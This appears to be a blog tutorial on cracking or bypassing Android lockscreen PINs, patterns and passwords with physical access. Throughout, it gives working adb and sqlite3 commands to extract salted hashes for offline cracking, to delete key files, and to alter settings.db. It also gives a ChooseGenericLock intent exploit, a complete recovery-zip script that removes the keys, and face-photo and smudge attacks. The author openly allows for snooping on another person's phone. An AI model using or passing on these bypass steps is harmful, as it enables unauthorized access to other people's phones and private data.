How to crack android lockscreen passwords

So, you want to crack an android lockscreen password? Perhaps you locked yourself out and just want your password reset or maybe you’re trying to snoop. Whatever the case may be, the methods I’m listing are for educational purposes only! So don’t blame me if you do something dumb, break the device, or get in trouble. Anyways, you’ll need physical access to the device. I’m not going over network-related methods because (1) that would take forever and (2) I don’t trust you with such occult knowledge.

Alright, so some of these methods require sqlite3. Many devices have this program already, but some do not. If you need it, then you can download an installer app from the market or you can pull it from the android emulator via adb pull /system/xbin/sqlite3, mount the system partition on the device as read/write via mount -o rw,remount -t yaffs2 /dev/block/mtdblock3 /system, and then push sqlite3 onto the device via adb push sqlite3 /system/xbin/. Alternatively, database files can be pulled and then inspected with SQLite Database Browser or a hex editor.

Hash Crack Method (Pins and Passwords)

adb shell
cat /data/system/password.key
cd /data/data/com.android.provider.settings/databases
sqlite3 settings.db
select value from secure where name='lockscreen.password_salt';
.quit

The file password.key contains SHA1 (20 bytes) and MD5 (16 bytes) salted hashsums of the password concatenated together in their hexadecimal representation. The salt is a 64-bit integer obtained from the settings.db SQL database file. With these pieces of information, the password can be attacked with a dictionary or brute forced.

Alternatively, this data can be accessed via the JTAG interface inside your phone (you have to physically open the phone through the battery compartment). If you do this, there are a few key things to remember:

  • The dump of the memory is broken into chunks of 2048 bytes.
  • The password.key file is 36 bytes long.
    • SHA1 is 20 bytes.
    • MD5 is 16 bytes.
  • The following 1960 bytes of the chunk are zero.
  • The remaining 16 bytes are random.

The salt can be fonud via the JTAG interface by looking for the string lockscreen.password_salt. There are a few key points to keep in mind here also:

  • The byte in front of the string must be between 0x0F and 0x35. This represents the length of the salt, which will be between 1 and 20 bytes.
  • In front of this byte, there must be 0x3D. This indicates a serial type representing a string with a length of 24. (this is the lockscreen.password_salt we searched).
  • In front of this byte must be a null byte.
  • The salt is directly after the string and ends according to its length.

Information on password handling obtained from LockPatternUtils.java at line 771.

Gesture Hash Crack Method (Patterns only)

In the LockPatternUtils.java class, we can see on line 624 that the pattern is stored as a SHA-1 hashsum of the pattern according to the following 3 by 3 matrix:

Android pattern lock numbers

The hashsum is stored in the /data/system/gesture.key file. Since no two points can be used twice, the minimum number of points is 4, and the max is 9; we can generate a dictionary from 0123 to 876543210 and then match the key in our dictionary. If we had an SQL dictionary, then we might run the query: select * from RainbowTable where hash="*hash*". Where hash is the hashsum found in gesture.key. Additionally, we can generate our own SHA-1 and use our own pattern.

Slide Switch Method

adb shell
am start -n com.android.settings/com.android.settings.ChooseGenericLock --ez confirm_credentials false --ei lockscreen.password type 0 --activity-clear-task

This vulnerability was found in ChooseGenericLock.java and has been fixed in Android 4.4 (KitKat). This class allows the user to change the lock mechanism. By setting the defaults of confirm_credentials to false, we control the flow to updatePreferencesOrFinish() and IF a password type is specified, the code continues to updateUnlockMethodAndFinish() and IF the password is of type PASSWORD_QUALITY_UNSPECIFIED, the method gets executed.

Key Removal Method

adb shell
rm /data/system/*.key

Now reboot and unlock the device using any arbitrary pattern, pin, or password.

Key Removal via Recovery Method

  1. Download Pattern-Password-disable.zip (may need to rename to update.zip).
  2. Put the zip file onto your SD card and put the SD card into your phone.
  3. Boot into recovery mode and flash the zip file.
  4. Reboot, done.

The structure of the zip file is as follows:

busybox
crack.sh
+- META-INF/
    CERT.RSA
    CERT.SF
    MANIFEST.MF
    +- com/
        +- google/
            +- android/
                update-binary
                updater-script

The busybox binary and source can be found at busybox.net. It provides several stripped down Unix tools in a single binary file. The update-binary file is created when we sign our archive (as are the certificate files), it parses the updater-script (which is written in Edify script). Let’s have a look at the two remaining files which are scripts:

update-script:

mount("yaffs2", "MTD", "system", "/system");
mount("yaffs2", "MTD", "cache", "/cache");
mount("yaffs2", "MTD", "userdata", "/data");
package_extract_file("busybox", "/tmp/busybox");
set_perm(0, 0, 0777, "/tmp/busybox");
package_extract_file("crack.sh", "/tmp/crack.sh");
set_perm(0, 0, 0777, "/tmp/crack.sh");
run_program("/tmp/crack.sh");
unmount("/data");
ui_print("Done!!");

crack.sh:

#!/sbin/sh
tmp/busybox mount -o remount rw /data
tmp/busybox rm data/system/*.key

Once you create these scripts and compile or download busybox then place them in their appropriate directories, create the update zip package and sign it. Essentially, this method is the same as the key removal method when you can’t access an adb shell. Similar techniques can be applied to other methods.

Key Removal via Aroma File Manager

  1. Download Aroma File Manager and put it in your SD card.
  2. Boot into recovery and mount everything.
  3. Apply update from the Aroma File Manager zip package.

Once the file manager has been opened, go into Menu > Settings and select “mount all partition in startup” located at the bottom. Exit the file manager, reflash it, and delete any .key files in /data/system. Exit the file manager, reboot, and use an arbitrary password.

SQL Method

adb shell
cd /data/data/com.android.providers.settings/databases

Patterns:

sqlite3 settings.db
update system set value=0 where name="lock_pattern_autolock";
update system set value=0 where name="lockscreen.lockedoutpermanently";
.quit

Pins:

sqlite3 settings.db
delete from system where name="lock_pattern_autolock";
update secure set value=65536 where name="lockscreen.password_type";
.quit

Passwords:

sqlite3 settings.db
delete from secure where name="lockscreen.password_salt";
delete from secure where name="lockscreen.password_type";
.quit

Now reboot and unlock device using an arbitrary pattern, pin, or password.

Google It Method

adb shell
svc wifi enable

This enables WiFi so you can enter your credentials via Google. Not much of a crack, but useful if you only know your Google password. Note that you must have a WiFi profile already on the device. If there is no such profile, you will not connect.

SMS Bypass Method

This method requires that your phone is rooted and you’ve set this up beforehand. This will not work for a phone that is currently locked out. Download the SMS bypass application and then set your secret code.

If your secret code is “1234” (which is the default), then you’d change your password by sending an SMS (from another phone or an email via an SMS gateway) to your phone that says “reset 1234”. Your phone will reboot and you can use an arbitrary password.

Smudge Attack

This is a method to discern password patterns on touchscreen devices by relying on the oily smudges left behind by the user’s fingers. It was developed at the University of Pennsylvania by Adam J. Aviv, Katherine Gibson, Evan Mossop, Matt Blaze, and Jonathan M. Smith. Using the proper camera, lighting conditions, and image processing software, the researchers broke passwords 68% of the time.

Face Attack

For users that use facial recognition, this can be unlocked simply by downloading a clear picture of the users face from social media like Facebook or by capturing a picture of the user by means of social engineering. Additionally, you could simply crack the PIN fallback when the face isn’t recognized.

Firmware Update

If, for whatever reason, none of the above methods work for you, simply update the firmware of the device. This can be done via recovery or JTAG. But if you’re going to interface via JTAG, then you could probably come up with something more clever than a firmware update. Usually, the manufacturer has a proprietary tool, which works through recovery mode, and firmware images which are used to update the device to the stock ROM. Note that your data may be erased depending on the nature of the update (usually it is).

Riff Box and JTAG Jig Guide
Buy Riff Box from GSM Server

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s